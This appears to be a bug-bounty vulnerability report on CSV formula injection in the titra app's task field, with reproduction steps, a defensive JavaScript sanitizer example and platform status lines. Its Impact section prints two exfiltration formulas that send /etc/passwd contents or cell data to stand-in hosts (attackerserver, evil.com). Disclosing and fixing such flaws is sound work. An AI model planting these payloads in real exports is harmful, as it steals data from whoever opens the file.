Formula Injection/CSV Injection due to Improper Neutralization of Formula Elements in CSV File in kromitgmbh/titra
Valid
Reported on Jun 3rd 2022
Description
Formula Injection/CSV Injection in "Task" due to Improper Neutralization of Formula Elements in CSV File.
Proof of Concept
- Click on the plus track button
- Under the task input field, enter the payload: =1+1
- Now enter the work hour as 2
- Then click on save
- Now go to details and click on CSV, and the CSV will be downloaded.
Video POC
https://drive.google.com/file/d/1AqXmJpt0N5C-6saL59MKxYGLQfM3nE1u/view?usp=sharing
Impact
Successful exploitation can lead to impacts such as client-side command injection, code execution, or remote exfiltration of contained confidential data. By constructing payloads such as
=HYPERLINK(CONCATENATE("http://attackerserver:port/a.txt?v="; ('file:///etc/passwd'#$passwd.A1));
=HYPERLINK("http://evil.com?x="&A3&","&B3&"[CR]","Error fetching info: Click me to resolve.")
an attacker can gain access to the /etc/passwd system file.
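One way to neutralize formula elements when building the CSV export, shown as an added example that is not part of the report and is not titra's code. The function names and sample rows are hypothetical, and the check covers the general set of formula-trigger characters rather than only the `=` used in the proof of concept.

```javascript
// Added example, not titra's code: function names and sample rows are hypothetical.

// A cell is formula-like if it starts with a tab or carriage return, or if its
// first non-whitespace character is one of = + - @ (trigger set from OWASP's
// CSV injection guidance; skipping leading whitespace is a conservative choice here).
const FORMULA_LIKE = /^[\t\r]|^\s*[=+\-@]/;

// Return the cell as text that a spreadsheet will display instead of evaluate.
function neutralizeCell(value) {
  if (value === null || value === undefined) return '';
  // Numbers produced by the application (e.g. hours) are not user text; keep -1 as -1.
  if (typeof value === 'number' && Number.isFinite(value)) return String(value);
  const text = String(value);
  // A leading single quote means the cell no longer starts with a formula character.
  return FORMULA_LIKE.test(text) ? `'${text}` : text;
}

// Quote every field and double embedded quotes (RFC 4180), so a value cannot
// close its field early and start a new cell that begins with a formula.
function toCsvField(value) {
  return `"${neutralizeCell(value).replace(/"/g, '""')}"`;
}

function toCsvRow(values) {
  return values.map(toCsvField).join(',');
}

function exportCsv(rows) {
  return rows.map(toCsvRow).join('\r\n');
}

// Constructed sample rows: project, task (user-controlled), hours.
const sampleRows = [
  ['Website', 'Write release notes', 2],
  ['Website', '=1+1', 2],
  ['Website', 'ok",=1+1,"', 0.5],
  ['Website', ' @SUM(A1:A2)', -1],
];

console.log(exportCsv(sampleRows));
```

The same neutralization belongs on every user-controlled column of the export, not only the task field.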
We are processing your report and will contact the kromitgmbh/titra team within 24 hours.
a year ago
We have contacted a member of the kromitgmbh/titra team and are waiting to hear back
a year ago
The researcher's credibility has increased: +7
The fix bounty has been dropped
This vulnerability will not receive a CVE
Thanks for reporting this!
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1